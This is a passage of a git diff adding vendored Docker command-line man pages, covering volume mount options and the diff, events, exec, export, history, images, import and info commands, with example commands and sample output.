The `OPTIONS` are a comma delimited list and can be: + + * [rw|ro] + * [z|Z] + * [`[r]shared`|`[r]slave`|`[r]private`] + +The `CONTAINER-DIR` must be an absolute path such as `/src/docs`. The `HOST-DIR` +can be an absolute path or a `name` value. A `name` value must start with an +alphanumeric character, followed by `a-z0-9`, `_` (underscore), `.` (period) or +`-` (hyphen). An absolute path starts with a `/` (forward slash). + +If you supply a `HOST-DIR` that is an absolute path, Docker bind-mounts to the +path you specify. If you supply a `name`, Docker creates a named volume by that +`name`. For example, you can specify either `/foo` or `foo` for a `HOST-DIR` +value. If you supply the `/foo` value, Docker creates a bind-mount. If you +supply the `foo` specification, Docker creates a named volume. + +You can specify multiple **-v** options to mount one or more mounts to a +container. To use these same mounts in other containers, specify the +**--volumes-from** option also. + +You can add `:ro` or `:rw` suffix to a volume to mount it read-only or +read-write mode, respectively. By default, the volumes are mounted read-write. +See examples. + +Labeling systems like SELinux require that proper labels are placed on volume +content mounted into a container. Without a label, the security system might +prevent the processes running inside the container from using the content. By +default, Docker does not change the labels set by the OS. + +To change a label in the container context, you can add either of two suffixes +`:z` or `:Z` to the volume mount. These suffixes tell Docker to relabel file +objects on the shared volumes. The `z` option tells Docker that two containers +share the volume content. As a result, Docker labels the content with a shared +content label. Shared volume labels allow all containers to read/write content. +The `Z` option tells Docker to label the content with a private unshared label. +Only the current container can use a private volume. 
+ +By default bind mounted volumes are `private`. That means any mounts done +inside container will not be visible on host and vice-a-versa. One can change +this behavior by specifying a volume mount propagation property. Making a +volume `shared` mounts done under that volume inside container will be +visible on host and vice-a-versa. Making a volume `slave` enables only one +way mount propagation and that is mounts done on host under that volume +will be visible inside container but not the other way around. + +To control mount propagation property of volume one can use `:[r]shared`, +`:[r]slave` or `:[r]private` propagation flag. Propagation property can +be specified only for bind mounted volumes and not for internal volumes or +named volumes. For mount propagation to work source mount point (mount point +where source dir is mounted on) has to have right propagation properties. For +shared volumes, source mount point has to be shared. And for slave volumes, +source mount has to be either shared or slave. + +Use `df ` to figure out the source mount and then use +`findmnt -o TARGET,PROPAGATION ` to figure out propagation +properties of source mount. If `findmnt` utility is not available, then one +can look at mount entry for source mount point in `/proc/self/mountinfo`. Look +at `optional fields` and see if any propagaion properties are specified. +`shared:X` means mount is `shared`, `master:X` means mount is `slave` and if +nothing is there that means mount is `private`. + +To change propagation properties of a mount point use `mount` command. For +example, if one wants to bind mount source directory `/foo` one can do +`mount --bind /foo /foo` and `mount --make-private --make-shared /foo`. This +will convert /foo into a `shared` mount point. Alternatively one can directly +change propagation properties of source mount. Say `/` is source mount for +`/foo`, then use `mount --make-shared /` to convert `/` into a `shared` mount. 
+ +> **Note**: +> When using systemd to manage the Docker daemon's start and stop, in the systemd +> unit file there is an option to control mount propagation for the Docker daemon +> itself, called `MountFlags`. The value of this setting may cause Docker to not +> see mount propagation changes made on the mount point. For example, if this value +> is `slave`, you may not be able to use the `shared` or `rshared` propagation on +> a volume. + + +To disable automatic copying of data from the container path to the volume, use +the `nocopy` flag. The `nocopy` flag can be set on bind mounts and named volumes. + +**--volume-driver**="" + Container's volume driver. This driver creates volumes specified either from + a Dockerfile's `VOLUME` instruction or from the `docker run -v` flag. + See **docker-volume-create(1)** for full details. + +**--volumes-from**=[] + Mount volumes from the specified container(s) + +**-w**, **--workdir**="" + Working directory inside the container + +# EXAMPLES + +## Specify isolation technology for container (--isolation) + +This option is useful in situations where you are running Docker containers on +Windows. The `--isolation=` option sets a container's isolation +technology. On Linux, the only supported is the `default` option which uses +Linux namespaces. On Microsoft Windows, you can specify these values: + +* `default`: Use the value specified by the Docker daemon's `--exec-opt` . If the `daemon` does not specify an isolation technology, Microsoft Windows uses `process` as its default value. +* `process`: Namespace isolation only. +* `hyperv`: Hyper-V hypervisor partition-based isolation. + +Specifying the `--isolation` flag without a value is the same as setting `--isolation="default"`. 
+ +# HISTORY +August 2014, updated by Sven Dowideit +September 2014, updated by Sven Dowideit +November 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-diff.1.md b/vendor/github.com/docker/docker/man/docker-diff.1.md new file mode 100644 index 0000000000..6c6c502533 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-diff.1.md @@ -0,0 +1,49 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-diff - Inspect changes on a container's filesystem + +# SYNOPSIS +**docker diff** +[**--help**] +CONTAINER + +# DESCRIPTION +Inspect changes on a container's filesystem. You can use the full or +shortened container ID or the container name set using +**docker run --name** option. + +# OPTIONS +**--help** + Print usage statement + +# EXAMPLES +Inspect the changes to on a nginx container: + + # docker diff 1fdfd1f54c1b + C /dev + C /dev/console + C /dev/core + C /dev/stdout + C /dev/fd + C /dev/ptmx + C /dev/stderr + C /dev/stdin + C /run + A /run/nginx.pid + C /var/lib/nginx/tmp + A /var/lib/nginx/tmp/client_body + A /var/lib/nginx/tmp/fastcgi + A /var/lib/nginx/tmp/proxy + A /var/lib/nginx/tmp/scgi + A /var/lib/nginx/tmp/uwsgi + C /var/log/nginx + A /var/log/nginx/access.log + A /var/log/nginx/error.log + + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. 
+June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-events.1.md b/vendor/github.com/docker/docker/man/docker-events.1.md new file mode 100644 index 0000000000..51b042775a --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-events.1.md @@ -0,0 +1,180 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-events - Get real time events from the server + +# SYNOPSIS +**docker events** +[**--help**] +[**-f**|**--filter**[=*[]*]] +[**--since**[=*SINCE*]] +[**--until**[=*UNTIL*]] +[**--format**[=*FORMAT*]] + + +# DESCRIPTION +Get event information from the Docker daemon. Information can include historical +information and real-time information. + +Docker containers will report the following events: + + attach, commit, copy, create, destroy, detach, die, exec_create, exec_detach, exec_start, export, kill, oom, pause, rename, resize, restart, start, stop, top, unpause, update + +Docker images report the following events: + + delete, import, load, pull, push, save, tag, untag + +Docker volumes report the following events: + + create, mount, unmount, destroy + +Docker networks report the following events: + + create, connect, disconnect, destroy + +# OPTIONS +**--help** + Print usage statement + +**-f**, **--filter**=[] + Filter output based on these conditions + - container (`container=`) + - event (`event=`) + - image (`image=`) + - plugin (experimental) (`plugin=`) + - label (`label=` or `label==`) + - type (`type=`) + - volume (`volume=`) + - network (`network=`) + - daemon (`daemon=`) + +**--since**="" + Show all events created since timestamp + +**--until**="" + Stream events until this timestamp + +**--format**="" + Format the output using the given Go template + +The `--since` and `--until` parameters can be Unix timestamps, date formatted +timestamps, or Go duration strings (e.g. `10m`, `1h30m`) computed +relative to the client machine's time. 
If you do not provide the `--since` option, +the command returns only new and/or live events. Supported formats for date +formatted time stamps include RFC3339Nano, RFC3339, `2006-01-02T15:04:05`, +`2006-01-02T15:04:05.999999999`, `2006-01-02Z07:00`, and `2006-01-02`. The local +timezone on the client will be used if you do not provide either a `Z` or a +`+-00:00` timezone offset at the end of the timestamp. When providing Unix +timestamps enter seconds[.nanoseconds], where seconds is the number of seconds +that have elapsed since January 1, 1970 (midnight UTC/GMT), not counting leap +seconds (aka Unix epoch or Unix time), and the optional .nanoseconds field is a +fraction of a second no more than nine digits long. + +# EXAMPLES + +## Listening for Docker events + +After running docker events a container 786d698004576 is started and stopped +(The container name has been shortened in the output below): + + # docker events + 2015-01-28T20:21:31.000000000-08:00 59211849bc10: (from whenry/testimage:latest) start + 2015-01-28T20:21:31.000000000-08:00 59211849bc10: (from whenry/testimage:latest) die + 2015-01-28T20:21:32.000000000-08:00 59211849bc10: (from whenry/testimage:latest) stop + +## Listening for events since a given date +Again the output container IDs have been shortened for the purposes of this document: + + # docker events --since '2015-01-28' + 2015-01-28T20:25:38.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) create + 2015-01-28T20:25:38.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) start + 2015-01-28T20:25:39.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) create + 2015-01-28T20:25:39.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) start + 2015-01-28T20:25:40.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) die + 2015-01-28T20:25:42.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) stop + 2015-01-28T20:25:45.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) start + 
2015-01-28T20:25:45.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) die + 2015-01-28T20:25:46.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) stop + +The following example outputs all events that were generated in the last 3 minutes, +relative to the current time on the client machine: + + # docker events --since '3m' + 2015-05-12T11:51:30.999999999Z07:00 4386fb97867d: (from ubuntu-1:14.04) die + 2015-05-12T15:52:12.999999999Z07:00 4386fb97867d: (from ubuntu-1:14.04) stop + 2015-05-12T15:53:45.999999999Z07:00 7805c1d35632: (from redis:2.8) die + 2015-05-12T15:54:03.999999999Z07:00 7805c1d35632: (from redis:2.8) stop + +If you do not provide the --since option, the command returns only new and/or +live events. + +## Format + +If a format (`--format`) is specified, the given template will be executed +instead of the default format. Go's **text/template** package describes all the +details of the format. + + # docker events --filter 'type=container' --format 'Type={{.Type}} Status={{.Status}} ID={{.ID}}' + Type=container Status=create ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 + Type=container Status=attach ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 + Type=container Status=start ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 + Type=container Status=resize ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 + Type=container Status=die ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 + Type=container Status=destroy ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 + +If a format is set to `{{json .}}`, the events are streamed as valid JSON +Lines. For information about JSON Lines, please refer to http://jsonlines.org/ . + + # docker events --format '{{json .}}' + {"status":"create","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f4.. + {"status":"attach","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f4.. 
+ {"Type":"network","Action":"connect","Actor":{"ID":"1b50a5bf755f6021dfa78e.. + {"status":"start","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f42.. + {"status":"resize","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f4.. + +## Filters + + $ docker events --filter 'event=stop' + 2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) + 2014-09-03T17:42:14.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) + + $ docker events --filter 'image=ubuntu-1:14.04' + 2014-05-10T17:42:14.999999999Z07:00 container start 4386fb97867d (image=ubuntu-1:14.04) + 2014-05-10T17:42:14.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04) + 2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) + + $ docker events --filter 'container=7805c1d35632' + 2014-05-10T17:42:14.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8) + 2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image= redis:2.8) + + $ docker events --filter 'container=7805c1d35632' --filter 'container=4386fb97867d' + 2014-09-03T15:49:29.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04) + 2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) + 2014-05-10T17:42:14.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8) + 2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) + + $ docker events --filter 'container=7805c1d35632' --filter 'event=stop' + 2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) + + $ docker events --filter 'type=volume' + 2015-12-23T21:05:28.136212689Z volume create test-event-volume-local (driver=local) + 2015-12-23T21:05:28.383462717Z volume mount test-event-volume-local (read/write=true, container=562fe10671e9273da25eed36cdce26159085ac7ee6707105fd534866340a5025, destination=/foo, driver=local, propagation=rprivate) + 2015-12-23T21:05:28.650314265Z volume unmount 
test-event-volume-local (container=562fe10671e9273da25eed36cdce26159085ac7ee6707105fd534866340a5025, driver=local) + 2015-12-23T21:05:28.716218405Z volume destroy test-event-volume-local (driver=local) + + $ docker events --filter 'type=network' + 2015-12-23T21:38:24.705709133Z network create 8b111217944ba0ba844a65b13efcd57dc494932ee2527577758f939315ba2c5b (name=test-event-network-local, type=bridge) + 2015-12-23T21:38:25.119625123Z network connect 8b111217944ba0ba844a65b13efcd57dc494932ee2527577758f939315ba2c5b (name=test-event-network-local, container=b4be644031a3d90b400f88ab3d4bdf4dc23adb250e696b6328b85441abe2c54e, type=bridge) + + $ docker events --filter 'type=plugin' (experimental) + 2016-07-25T17:30:14.825557616Z plugin pull ec7b87f2ce84330fe076e666f17dfc049d2d7ae0b8190763de94e1f2d105993f (name=tiborvass/sample-volume-plugin:latest) + 2016-07-25T17:30:14.888127370Z plugin enable ec7b87f2ce84330fe076e666f17dfc049d2d7ae0b8190763de94e1f2d105993f (name=tiborvass/sample-volume-plugin:latest) + + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit +June 2015, updated by Brian Goff +October 2015, updated by Mike Brown diff --git a/vendor/github.com/docker/docker/man/docker-exec.1.md b/vendor/github.com/docker/docker/man/docker-exec.1.md new file mode 100644 index 0000000000..fe9c279e7e --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-exec.1.md @@ -0,0 +1,71 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-exec - Run a command in a running container + +# SYNOPSIS +**docker exec** +[**-d**|**--detach**] +[**--detach-keys**[=*[]*]] +[**-e**|**--env**[=*[]*]] +[**--help**] +[**-i**|**--interactive**] +[**--privileged**] +[**-t**|**--tty**] +[**-u**|**--user**[=*USER*]] +CONTAINER COMMAND [ARG...] + +# DESCRIPTION + +Run a process in a running container. 
+ +The command started using `docker exec` will only run while the container's primary +process (`PID 1`) is running, and will not be restarted if the container is restarted. + +If the container is paused, then the `docker exec` command will wait until the +container is unpaused, and then run. + +# OPTIONS +**-d**, **--detach**=*true*|*false* + Detached mode: run command in the background. The default is *false*. + +**--detach-keys**="" + Override the key sequence for detaching a container. Format is a single character `[a-Z]` or `ctrl-` where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`. + +**-e**, **--env**=[] + Set environment variables + + This option allows you to specify arbitrary environment variables that are +available for the command to be executed. + +**--help** + Print usage statement + +**-i**, **--interactive**=*true*|*false* + Keep STDIN open even if not attached. The default is *false*. + +**--privileged**=*true*|*false* + Give the process extended [Linux capabilities](http://man7.org/linux/man-pages/man7/capabilities.7.html) +when running in a container. The default is *false*. + + Without this flag, the process run by `docker exec` in a running container has +the same capabilities as the container, which may be limited. Set +`--privileged` to give all capabilities to the process. + +**-t**, **--tty**=*true*|*false* + Allocate a pseudo-TTY. The default is *false*. + +**-u**, **--user**="" + Sets the username or UID used and optionally the groupname or GID for the specified command. + + The following examples are all valid: + --user [user | user:group | uid | uid:gid | user:gid | uid:group ] + + Without this argument the command will be run as root in the container. + +The **-t** option is incompatible with a redirection of the docker client +standard input. 
+ +# HISTORY +November 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-export.1.md b/vendor/github.com/docker/docker/man/docker-export.1.md new file mode 100644 index 0000000000..3d59e4788e --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-export.1.md @@ -0,0 +1,46 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-export - Export the contents of a container's filesystem as a tar archive + +# SYNOPSIS +**docker export** +[**--help**] +[**-o**|**--output**[=*""*]] +CONTAINER + +# DESCRIPTION +Export the contents of a container's filesystem using the full or shortened +container ID or container name. The output is exported to STDOUT and can be +redirected to a tar file. + +Stream to a file instead of STDOUT by using **-o**. + +# OPTIONS +**--help** + Print usage statement + +**-o**, **--output**="" + Write to a file, instead of STDOUT + +# EXAMPLES +Export the contents of the container called angry_bell to a tar file +called angry_bell.tar: + + # docker export angry_bell > angry_bell.tar + # docker export --output=angry_bell-latest.tar angry_bell + # ls -sh angry_bell.tar + 321M angry_bell.tar + # ls -sh angry_bell-latest.tar + 321M angry_bell-latest.tar + +# See also +**docker-import(1)** to create an empty filesystem image +and import the contents of the tarball into it, then optionally tag it. + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. 
+June 2014, updated by Sven Dowideit +January 2015, updated by Joseph Kern (josephakern at gmail dot com) diff --git a/vendor/github.com/docker/docker/man/docker-history.1.md b/vendor/github.com/docker/docker/man/docker-history.1.md new file mode 100644 index 0000000000..91edefe25f --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-history.1.md @@ -0,0 +1,52 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-history - Show the history of an image + +# SYNOPSIS +**docker history** +[**--help**] +[**-H**|**--human**[=*true*]] +[**--no-trunc**] +[**-q**|**--quiet**] +IMAGE + +# DESCRIPTION + +Show the history of when and how an image was created. + +# OPTIONS +**--help** + Print usage statement + +**-H**, **--human**=*true*|*false* + Print sizes and dates in human readable format. The default is *true*. + +**--no-trunc**=*true*|*false* + Don't truncate output. The default is *false*. + +**-q**, **--quiet**=*true*|*false* + Only show numeric IDs. The default is *false*. + +# EXAMPLES + $ docker history fedora + IMAGE CREATED CREATED BY SIZE COMMENT + 105182bb5e8b 5 days ago /bin/sh -c #(nop) ADD file:71356d2ad59aa3119d 372.7 MB + 73bd853d2ea5 13 days ago /bin/sh -c #(nop) MAINTAINER Lokesh Mandvekar 0 B + 511136ea3c5a 10 months ago 0 B Imported from - + +## Display comments in the image history +The `docker commit` command has a **-m** flag for adding comments to the image. These comments will be displayed in the image history. 
+ + $ sudo docker history docker:scm + IMAGE CREATED CREATED BY SIZE COMMENT + 2ac9d1098bf1 3 months ago /bin/bash 241.4 MB Added Apache to Fedora base image + 88b42ffd1f7c 5 months ago /bin/sh -c #(nop) ADD file:1fd8d7f9f6557cafc7 373.7 MB + c69cab00d6ef 5 months ago /bin/sh -c #(nop) MAINTAINER Lokesh Mandvekar 0 B + 511136ea3c5a 19 months ago 0 B Imported from - + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-images.1.md b/vendor/github.com/docker/docker/man/docker-images.1.md new file mode 100644 index 0000000000..d7958d0dc4 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-images.1.md @@ -0,0 +1,153 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-images - List images + +# SYNOPSIS +**docker images** +[**--help**] +[**-a**|**--all**] +[**--digests**] +[**-f**|**--filter**[=*[]*]] +[**--format**=*"TEMPLATE"*] +[**--no-trunc**] +[**-q**|**--quiet**] +[REPOSITORY[:TAG]] + +# DESCRIPTION +This command lists the images stored in the local Docker repository. + +By default, intermediate images, used during builds, are not listed. Some of the +output, e.g., image ID, is truncated, for space reasons. However the truncated +image ID, and often the first few characters, are enough to be used in other +Docker commands that use the image ID. The output includes repository, tag, image +ID, date created and the virtual size. + +The title REPOSITORY for the first title may seem confusing. It is essentially +the image name. However, because you can tag a specific image, and multiple tags +(image instances) can be associated with a single name, the name is really a +repository for all tagged images of the same name. For example consider an image +called fedora. It may be tagged with 18, 19, or 20, etc. to manage different +versions. 
+
+# OPTIONS
+**-a**, **--all**=*true*|*false*
+ Show all images (by default filter out the intermediate image layers). The default is *false*.
+
+**--digests**=*true*|*false*
+ Show image digests. The default is *false*.
+
+**-f**, **--filter**=[]
+ Filters the output based on these conditions:
+ - dangling=(true|false) - find unused images
+ - label= or label==
+ - before=([:tag]||)
+ - since=([:tag]||)
+
+**--format**="*TEMPLATE*"
+ Pretty-print images using a Go template.
+ Valid placeholders:
+ .ID - Image ID
+ .Repository - Image repository
+ .Tag - Image tag
+ .Digest - Image digest
+ .CreatedSince - Elapsed time since the image was created
+ .CreatedAt - Time when the image was created
+ .Size - Image disk size
+
+**--help**
+ Print usage statement
+
+**--no-trunc**=*true*|*false*
+ Don't truncate output. The default is *false*.
+
+**-q**, **--quiet**=*true*|*false*
+ Only show numeric IDs. The default is *false*.
+
+# EXAMPLES
+
+## Listing the images
+
+To list the images in a local repository (not the registry) run:
+
+ docker images
+
+The list will contain the image repository name, a tag for the image, and an
+image ID, when it was created and its virtual size. Columns: REPOSITORY, TAG,
+IMAGE ID, CREATED, and SIZE.
+
+The `docker images` command takes an optional `[REPOSITORY[:TAG]]` argument
+that restricts the list to images that match the argument. If you specify
+`REPOSITORY` but no `TAG`, the `docker images` command lists all images in the
+given repository.
+
+ docker images java
+
+The `[REPOSITORY[:TAG]]` value must be an "exact match". This means that, for example,
+`docker images jav` does not match the image `java`.
+
+If both `REPOSITORY` and `TAG` are provided, only images matching that
+repository and tag are listed.
To find all local images in the "java" +repository with tag "8" you can use: + + docker images java:8 + +To get a verbose list of images which contains all the intermediate images +used in builds use **-a**: + + docker images -a + +Previously, the docker images command supported the --tree and --dot arguments, +which displayed different visualizations of the image data. Docker core removed +this functionality in the 1.7 version. If you liked this functionality, you can +still find it in the third-party dockviz tool: https://github.com/justone/dockviz. + +## Listing images in a desired format + +When using the --format option, the image command will either output the data +exactly as the template declares or, when using the `table` directive, will +include column headers as well. You can use special characters like `\t` for +inserting tab spacing between columns. + +The following example uses a template without headers and outputs the ID and +Repository entries separated by a colon for all images: + + docker images --format "{{.ID}}: {{.Repository}}" + 77af4d6b9913: + b6fa739cedf5: committ + 78a85c484bad: ipbabble + 30557a29d5ab: docker + 5ed6274db6ce: + 746b819f315e: postgres + 746b819f315e: postgres + 746b819f315e: postgres + 746b819f315e: postgres + +To list all images with their repository and tag in a table format you can use: + + docker images --format "table {{.ID}}\t{{.Repository}}\t{{.Tag}}" + IMAGE ID REPOSITORY TAG + 77af4d6b9913 + b6fa739cedf5 committ latest + 78a85c484bad ipbabble + 30557a29d5ab docker latest + 5ed6274db6ce + 746b819f315e postgres 9 + 746b819f315e postgres 9.3 + 746b819f315e postgres 9.3.5 + 746b819f315e postgres latest + +Valid template placeholders are listed above. + +## Listing only the shortened image IDs + +Listing just the shortened image IDs. This can be useful for some automated +tools. 
+ + docker images -q + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-import.1.md b/vendor/github.com/docker/docker/man/docker-import.1.md new file mode 100644 index 0000000000..43d65efe6a --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-import.1.md @@ -0,0 +1,72 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-import - Create an empty filesystem image and import the contents of the tarball (.tar, .tar.gz, .tgz, .bzip, .tar.xz, .txz) into it, then optionally tag it. + +# SYNOPSIS +**docker import** +[**-c**|**--change**[=*[]*]] +[**-m**|**--message**[=*MESSAGE*]] +[**--help**] +file|URL|**-**[REPOSITORY[:TAG]] + +# OPTIONS +**-c**, **--change**=[] + Apply specified Dockerfile instructions while importing the image + Supported Dockerfile instructions: `CMD`|`ENTRYPOINT`|`ENV`|`EXPOSE`|`ONBUILD`|`USER`|`VOLUME`|`WORKDIR` + +**--help** + Print usage statement + +**-m**, **--message**="" + Set commit message for imported image + +# DESCRIPTION +Create a new filesystem image from the contents of a tarball (`.tar`, +`.tar.gz`, `.tgz`, `.bzip`, `.tar.xz`, `.txz`) into it, then optionally tag it. + + +# EXAMPLES + +## Import from a remote location + + # docker import http://example.com/exampleimage.tgz example/imagerepo + +## Import from a local file + +Import to docker via pipe and stdin: + + # cat exampleimage.tgz | docker import - example/imagelocal + +Import with a commit message. + + # cat exampleimage.tgz | docker import --message "New image imported from tarball" - exampleimagelocal:new + +Import to a Docker image from a local file. 
+ + # docker import /path/to/exampleimage.tgz + + +## Import from a local file and tag + +Import to docker via pipe and stdin: + + # cat exampleimageV2.tgz | docker import - example/imagelocal:V-2.0 + +## Import from a local directory + + # tar -c . | docker import - exampleimagedir + +## Apply specified Dockerfile instructions while importing the image +This example sets the docker image ENV variable DEBUG to true by default. + + # tar -c . | docker import -c="ENV DEBUG true" - exampleimagedir + +# See also +**docker-export(1)** to export the contents of a filesystem as a tar archive to STDOUT. + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-info.1.md b/vendor/github.com/docker/docker/man/docker-info.1.md new file mode 100644 index 0000000000..bb7a8fb4c2 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-info.1.md @@ -0,0 +1,187 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-info - Display system-wide information + +# SYNOPSIS +**docker info** +[**--help**] +[**-f**|**--format**[=*FORMAT*]] + +# DESCRIPTION +This command displays system wide information regarding the Docker installation. +Information displayed includes the kernel version, number of containers and images. +The number of images shown is the number of unique images. The same image tagged +under different names is counted only once. + +If a format is specified, the given template will be executed instead of the +default format. Go's **text/template** package +describes all the details of the format. + +Depending on the storage driver in use, additional information can be shown, such +as pool name, data file, metadata file, data space used, total data space, metadata +space used, and total metadata space. 
+ +The data file is where the images are stored and the metadata file is where the +meta data regarding those images are stored. When run for the first time Docker +allocates a certain amount of data space and meta data space from the space +available on the volume where `/var/lib/docker` is mounted. + +# OPTIONS +**--help** + Print usage statement + +**-f**, **--format**="" + Format the output using the given Go template + +# EXAMPLES + +## Display Docker system information + +Here is a sample output for a daemon running on Ubuntu, using the overlay2 +storage driver: + + $ docker -D info + Containers: 14 + Running: 3 + Paused: 1 + Stopped: 10 + Images: 52 + Server Version: 1.13.0 + Storage Driver: overlay2 + Backing Filesystem: extfs + Supports d_type: true + Native Overlay Diff: false + Logging Driver: json-file + Cgroup Driver: cgroupfs + Plugins: + Volume: local + Network: bridge host macvlan null overlay + Swarm: active + NodeID: rdjq45w1op418waxlairloqbm + Is Manager: true + ClusterID: te8kdyw33n36fqiz74bfjeixd + Managers: 1 + Nodes: 2 + Orchestration: + Task History Retention Limit: 5 + Raft: + Snapshot Interval: 10000 + Number of Old Snapshots to Retain: 0 + Heartbeat Tick: 1 + Election Tick: 3 + Dispatcher: + Heartbeat Period: 5 seconds + CA Configuration: + Expiry Duration: 3 months + Node Address: 172.16.66.128 172.16.66.129 + Manager Addresses: + 172.16.66.128:2477 + Runtimes: runc + Default Runtime: runc + Init Binary: docker-init + containerd version: 8517738ba4b82aff5662c97ca4627e7e4d03b531 + runc version: ac031b5bf1cc92239461125f4c1ffb760522bbf2 + init version: N/A (expected: v0.13.0) + Security Options: + apparmor + seccomp + Profile: default + Kernel Version: 4.4.0-31-generic + Operating System: Ubuntu 16.04.1 LTS + OSType: linux + Architecture: x86_64 + CPUs: 2 + Total Memory: 1.937 GiB + Name: ubuntu + ID: H52R:7ZR6:EIIA:76JG:ORIY:BVKF:GSFU:HNPG:B5MK:APSC:SZ3Q:N326 + Docker Root Dir: /var/lib/docker + Debug Mode (client): true + Debug Mode 
(server): true + File Descriptors: 30 + Goroutines: 123 + System Time: 2016-11-12T17:24:37.955404361-08:00 + EventsListeners: 0 + Http Proxy: http://test:test@proxy.example.com:8080 + Https Proxy: https://test:test@proxy.example.com:8080 + No Proxy: localhost,127.0.0.1,docker-registry.somecorporation.com + Registry: https://index.docker.io/v1/ + WARNING: No swap limit support + Labels: + storage=ssd + staging=true + Experimental: false + Insecure Registries: + 127.0.0.0/8 + Registry Mirrors: + http://192.168.1.2/ + http://registry-mirror.example.com:5000/ + Live Restore Enabled: false + + + +The global `-D` option tells all `docker` commands to output debug information. + +The example below shows the output for a daemon running on Red Hat Enterprise Linux, +using the devicemapper storage driver. As can be seen in the output, additional +information about the devicemapper storage driver is shown: + + $ docker info + Containers: 14 + Running: 3 + Paused: 1 + Stopped: 10 + Untagged Images: 52 + Server Version: 1.10.3 + Storage Driver: devicemapper + Pool Name: docker-202:2-25583803-pool + Pool Blocksize: 65.54 kB + Base Device Size: 10.74 GB + Backing Filesystem: xfs + Data file: /dev/loop0 + Metadata file: /dev/loop1 + Data Space Used: 1.68 GB + Data Space Total: 107.4 GB + Data Space Available: 7.548 GB + Metadata Space Used: 2.322 MB + Metadata Space Total: 2.147 GB + Metadata Space Available: 2.145 GB + Udev Sync Supported: true + Deferred Removal Enabled: false + Deferred Deletion Enabled: false + Deferred Deleted Device Count: 0 + Data loop file: /var/lib/docker/devicemapper/devicemapper/data + Metadata loop file: /var/lib/docker/devicemapper/devicemapper/metadata + Library Version: 1.02.107-RHEL7 (2015-12-01) + Execution Driver: native-0.2 + Logging Driver: json-file + Plugins: + Volume: local + Network: null host bridge + Kernel Version: 3.10.0-327.el7.x86_64 + Operating System: Red Hat Enterprise Linux Server 7.2 (Maipo) + OSType: linux + Architecture: x86_64 
